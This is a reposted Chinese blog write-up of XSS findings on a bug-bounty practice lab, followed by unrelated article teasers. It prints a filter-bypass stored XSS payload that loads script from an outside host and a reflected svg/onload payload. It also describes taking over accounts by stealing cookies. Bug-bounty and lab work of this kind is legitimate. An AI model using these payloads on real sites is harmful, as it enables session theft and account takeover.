bugbountyhunter scope BARKER:第五滴血 存储型 XSS Filter 绕过 报告

news/2025/1/19 8:01:01/文章来源:https://www.cnblogs.com/sec875/p/18337889

经过简单的payload调试,发现存在 Filter
image

检查:https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet

image

发现payload: <script%20src=//sec875.com/1.html%0A--%3E 有效
image

访问 https://5cc259cfb319-sec875.a.barker-social.com/group/11 触发xss payload
image

image

hackerone 将以上步骤视为有效报告

后利用:可部署VPS或在本地DNS指向127.0.0.1已证明XSS可以被执行(需要部署SSL http)

Report title:Storage Cross-Site Scripting XSS
Endpoint:https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Vulnerable Parameter:tagline
Payload:POST tagline parameter <script%20src=//sec875.com/1.html%0A--%3E正文
l have discovered a Storage XSS vulnerability affecting the endpoint 'group/11/edit' in the parameter 'tagline'. The payloed requires have a filter bypass and is a simple, <script%20src=//sec875.com/1.html%0A--%3EYou can see a working proof of concept here:
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451450/pb4gmhtotflfexb9h4v2.png)To reproduce:
1.Go to the barker app login page, Discover the returnUrl parameter
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451853/oytimk1jhzvk2ujc1loe.png)
2.Visit https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F%22%3E%3Csvg/onload=alert(0)%3E
3.You will observe xss executesPayload used: "><svg/onload=alert(0)>.No filtering at all.
Vulnerable parameter: returnUrl
Endpoint/URL: https://7b6ae0ae6c79-sec875.a.barker-social.com/loginlmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/776435.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

postmam响应数据的提取和关联,用于登录接口后面其他功能依赖登录功能

前置条件:postman创建环境变量 1、提取数据进行保存 2、提取数据后,点击发送请求出来的数据3、引用 生命不断追求不止

bugbountyhunter scope BARKER:第四滴血 DOM型 XSS 报告

使用赏猎技战法 https://www.cnblogs.com/sec875/p/18335838寻找功能点,熟悉功能点,收集参数,观察正常(提供预期值(对的)或(不对的))与异常(提供非预期值),威胁建模 登录功能点:https://5cc259cfb319-sec875.a.barker-social.com/login 输入不正确的账号,触发错误检查…

夏天厨房里面出现小甲虫是什么虫子 All In One

夏天厨房里面出现小甲虫是什么虫子 All In One 小甲虫 烟草甲夏天厨房里面出现小甲虫是什么虫子 All In One小甲虫烟草甲 锯角毛窃蠹(学名:Lasioderma serricorne),又称烟甲虫、烟草甲,为毛窃蠹属下的一个物种。毛窃蠹属原为标本甲科(Anobiidae)的成员,今改属蛛甲科。是…

go 微服务

RPC:协议 grpc:google开发的rpc框架,支持多个语言(轻量级) go-mirco:go语言的微服务框架

Linux学习——3 常用目录含义

/dev: U盘等硬件插入到机器产生的文件 /lib: 类似windows的dll文件,Linux是 .so文件 /sbin: 可执行的二进制文件,比如ls是命令,二进制命令,cd,mv等 /var: 比如/var/log 系统运行时候产生的各种信息和日志 /etc: 比如 /etc/nginx.conf 运维等软件的配置文件

可怕的甲醛

新房收楼刚好一个月,身体出现了一些异常信号,偶然间看到 B 站一个 “甲醛,夺走我一切的魔鬼” 的视频,才意识到事情严重性,赶紧复盘一下过去,并且为未来如何应对甲醛做一些应对的措施。导读 新房收楼刚好一个月,身体出现了一些异常信号,偶然间看到 B 站一个《甲醛,夺…

k8s数据存储

目录一、引言二、基本存储1、EmptyDir1.1、示例1.2、创建资源清单1.3、创建Pod1.4、查看Pod1.5、通过PodIP访问nginx1.6、查看容器的标准输出2、HostPath2.1、创建资源清单2.2、.spec.volumes[*].hostPath.type2.3、创建Pod2.4、查看Pod2.5、通过PodIP访问nginx2.6、到host的/r…